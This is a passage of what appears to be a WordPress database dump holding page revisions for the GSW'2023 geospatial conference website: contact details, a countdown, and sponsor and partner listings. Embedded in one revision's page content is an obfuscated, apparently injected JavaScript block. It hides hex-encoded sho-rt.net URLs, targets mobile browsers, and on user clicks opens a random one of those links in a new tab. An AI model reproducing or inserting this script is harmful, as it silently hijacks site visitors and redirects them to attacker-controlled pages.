Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 03:50:23','2023-08-13 03:50:23','',3066,'https://gsw2023.com/?p=5096',0,'revision','',0),
(5097,1,'2023-08-13 03:51:47','2023-08-13 03:51:47','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\">Prime Sponsor</span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 120px !important;}\"]\r\n\r\n<img class=\"alignnone wp-image-5093 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 95px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button 